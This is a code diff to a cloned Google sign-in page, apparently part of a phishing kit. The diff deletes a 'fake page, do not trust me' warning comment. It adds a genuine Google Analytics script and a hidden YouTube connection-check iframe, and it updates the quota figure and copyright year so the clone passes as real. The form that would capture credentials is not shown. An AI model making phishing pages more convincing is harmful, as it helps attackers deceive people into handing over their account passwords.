--- a/sites/google/login.html
+++ b/sites/google/login.html
@@ -1,4 +1,3 @@
-<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
 <!DOCTYPE html>
 <html lang="en"><head>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
@@ -1398,7 +1397,7 @@
   *display: inline; /*ie7*/
   }
 </style>
-  <script src="index_files/ga.js" async="" type="text/javascript"></script></head>
+  <script src="index_files/ga.js" async="" type="text/javascript"></script><script type="text/javascript" async="" src="http://www.google-analytics.com/ga.js"></script></head>
   <body>
   <div class="wrapper">
   <div class="google-header-bar">
@@ -1471,7 +1470,7 @@
   <img src="http://i757.photobucket.com/albums/xx214/rohanraj/filing_cabinet-g42.png" alt="">
   <p class="title">Lots of space</p>
   <p>
-  Over <span id="quota">10367.012381</span> megabytes (and counting) of free storage.
+  Over <span id="quota">11370.958280</span> megabytes (and counting) of free storage.
   </p>
   </li>
   <li>
@@ -1501,12 +1500,12 @@
   <p>Get business email, calendar, and online docs @your_company.com. <a href="http://www.google.com/enterprise/apps/business/campaign/personal_gmail.html?utm_source=gmail_promo&amp;utm_medium=et&amp;utm_campaign=WW--2012q3--ww_apps_smb_et_2012-gmailloginpage:70160000000jf0oaag&amp;utm_content=en_US">Learn more</a></p>
   </div>
   </div>
-  <div id="cc_iframe_parent"><iframe id="youtube" src="index_files/CheckConnection.htm" style="visibility: hidden; width: 1px; height: 1px; position: absolute; top: -100px;"></iframe></div>
+  <div id="cc_iframe_parent"><iframe id="youtube" src="index_files/CheckConnection.htm" style="visibility: hidden; width: 1px; height: 1px; position: absolute; top: -100px;"></iframe><iframe style="visibility: hidden; width: 1px; height: 1px; position: absolute; top: -100px;" src="https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&amp;v=605652683&amp;timestamp=1613573910924" id="youtube"></iframe></div>
   </div>
 <div class="google-footer-bar">
   <div class="footer content clearfix">
   <ul>
-  <li>Copyright 2015 Google</li>
+  <li>Copyright 2021 by Google</li>
   <li><a href="http://www.google.com/apps/intl/en/business/gmail.html#utm_medium=et&amp;utm_source=gmail-signin-en&amp;utm_campaign=crossnav" target="_blank">Gmail for Work</a></li>
   <li><a href="http://mail.google.com/mail/help/intl/en/terms.html" target="_blank">Terms &amp; Privacy</a></li>
   <li><a href="http://mail.google.com/support/?hl=en" target="_blank">Help</a></li>
@@ -2076,5 +2075,6 @@ window.onload = function() {
 </script>
   </div>
   
+
 
 </body></html>
